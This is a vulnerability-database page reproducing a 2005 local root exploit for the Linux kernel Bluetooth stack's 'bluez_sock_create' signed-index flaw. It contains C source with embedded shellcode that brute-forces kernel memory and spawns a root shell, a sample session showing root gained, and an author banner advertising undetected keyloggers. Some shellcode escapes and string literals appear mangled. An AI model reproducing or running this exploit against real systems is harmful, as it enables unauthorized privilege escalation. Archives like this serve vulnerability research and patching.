Vulners
Lucene search
Linux Kernel 2.4.30/2.6.11.5 - BlueTooth 'bluez_sock_create' Local Privilege Escalation
/*
EDB Note: Update can be found here ~ https://www.exploit-db.com/exploits/25290/
source: https://www.securityfocus.com/bid/12911/info
A local signed-buffer-index vulnerability affects the Linux kernel because it fails to securely handle signed values when validating memory indexes.
A local attacker may leverage this issue to gain escalated privileges on an affected computer.
*/
/* LINUX KERNEL < 2.6.11.5 BLUETOOTH STACK LOCAL ROOT EXPLOIT
*
* 19 October 2005
http://backdoored.net
Visit us for Undetected keyloggers and packers.Thanx
h4x0r bluetooth $ id
uid=1000(addicted) gid=100(users) groups=100(users)
h4x0r bluetooth $
h4x0r bluetooth $ ./backdoored-bluetooth
KERNEL Oops. Exit Code = 11.(Segmentation fault)
KERNEL Oops. Exit Code = 11.(Segmentation fault)
KERNEL Oops. Exit Code = 11.(Segmentation fault)
KERNEL Oops. Exit Code = 11.(Segmentation fault)
KERNEL Oops. Exit Code = 11.(Segmentation fault)
Checking the Effective user id after overflow : UID = 0
h4x0r bluetooth # id
uid=0(root) gid=0(root) groups=100(users)
h4x0r bluetooth #
h4x0r bluetooth # dmesg
PREEMPT SMP
Modules linked in:
CPU: 0
EIP: 0060:[<c0405ead>] Not tainted VLI
EFLAGS: 00010286 (2.6.9)
EIP is at bt_sock_create+0x3d/0x130
eax: ffffffff ebx: ffebfe34 ecx: 00000000 edx: c051bea0
esi: ffffffa3 edi: ffffff9f ebp: 00000001 esp: c6729f1c
ds: 007b es: 007b ss: 0068
Process backdoored-bluetooth (pid: 8809, threadinfo=c6729000
task=c6728a20)
Stack: cef24e00 0000001f 0000001f c6581680 ffffff9f c039a3bb c6581680
ffebfe34
00000001 b8000c80 bffff944 c6729000 c039a58d 0000001f 00000003 ffebfe34
c6729f78 00000000 c039a60b 0000001f 00000003 ffebfe34 c6729f78 b8000c80
Call Trace:
[<c039a3bb>] __sock_create+0xfb/0x2a0
[<c039a58d>] sock_create+0x2d/0x40
[<c039a60b>] sys_socket+0x2b/0x60
[<c039b4e8>] sys_socketcall+0x68/0x260
[<c0117a9c>] finish_task_switch+0x3c/0x90
[<c0117b07>] schedule_tail+0x17/0x50
[<c0115410>] do_page_fault+0x0/0x5e9
[<c01031af>] syscall_call+0x7/0xb
Code: 24 0c 89 7c 24 10 83 fb 07 0f 8f b1 00 00 00 8b 04 9d 60 a4 5d c0
85 c0 0f 84 d7 00 00 00 85 c0 be a3 ff ff ff 0f 84 93 00 00 00
<8b> 50 10 bf 01 00 00 00
85 d2 74 37 b8 00 f0 ff ff 21 e0 ff 40
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <unistd.h>
#include <limits.h>
#include <signal.h>
#include <sys/wait.h>
#define KERNEL_SPACE_MEMORY_BRUTE_START 0xc0000000
#define KERNEL_SPACE_MEMORY_BRUTE_END 0xffffffff
#define KERNEL_SPACE_BUFFER 0x100000
char asmcode[] = /*Global shellcode*/
"xb8x00xf0xffxffx31xc9x21xe0x8bx10x89x8a"
"x80x01x00x00x31xc9x89x8ax7cx01x00x00x8b"
"x00x31xc9x31xd2x89x88x90x01x00x00x89x90"
"x8cx01x00x00xb8xffxffxffxffxc3";
struct net_proto_family {
int family;
int (*create) (int *sock, int protocol);
short authentication;
short encryption;
short encrypt_net;
int *owner;
};
int check_zombie_child(int status,pid_t pid)
{
waitpid(pid,&status,0);
if(WIFEXITED(status))
{
if(WEXITSTATUS(status) != 0xFF)
exit(-1);
}
else if (WIFSIGNALED(status))
{
printf("KERNEL Oops. Exit Code = %d.(%s)
",WTERMSIG(status),strsignal(WTERMSIG(status)));
return(WTERMSIG(status));
}
}
int brute_socket_create (int negative_proto_number)
{
socket(AF_BLUETOOTH,SOCK_RAW, negative_proto_number); /* overflowing
proto number with negative 32bit value */
int i;
i = geteuid();
printf("Checking the Effective user id after overflow : UID = %d
",i);
if(i)
exit(EXIT_FAILURE);
printf("0wnage D0ne bro. ");
execl("/bin/sh","sh",NULL);
exit(EXIT_SUCCESS);
}
int main(void)
{
pid_t pid;
int counter;
int status;
int *kernel_return;
char kernel_buffer[KERNEL_SPACE_BUFFER];
unsigned int brute_start;
unsigned int where_kernel;
struct net_proto_family *bluetooth;
bluetooth = (struct net_proto_family *) malloc(sizeof(struct
net_proto_family));
bzero(bluetooth,sizeof(struct net_proto_family));
bluetooth->family = AF_BLUETOOTH;
bluetooth->authentication = 0x0; /* No Authentication */
bluetooth->encryption = 0x0; /* No Encryption */
bluetooth->encrypt_net = 0x0; /* No Encrypt_net */
bluetooth->owner = 0x0; /* No fucking owner */
bluetooth->create = (int *) asmcode;
kernel_return = (int *) kernel_buffer;
for( counter = 0; counter < KERNEL_SPACE_BUFFER; counter+=4,
kernel_return++)
*kernel_return = (int)bluetooth;
brute_start = KERNEL_SPACE_MEMORY_BRUTE_START;
printf("Bluetooth stack local root exploit ");
printf("http://backdoored/net");
while ( brute_start < KERNEL_SPACE_MEMORY_BRUTE_END )
{
where_kernel = (brute_start - (unsigned int)&kernel_buffer) / 0x4 ;
where_kernel = -where_kernel;
pid = fork();
if(pid == 0 )
brute_socket_create(where_kernel);
check_zombie_child(status,pid);
brute_start += KERNEL_SPACE_BUFFER;
fflush(stdout);
}
return 0;
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Oct 2005 00:00Current
7.4High risk
Vulners AI Score7.4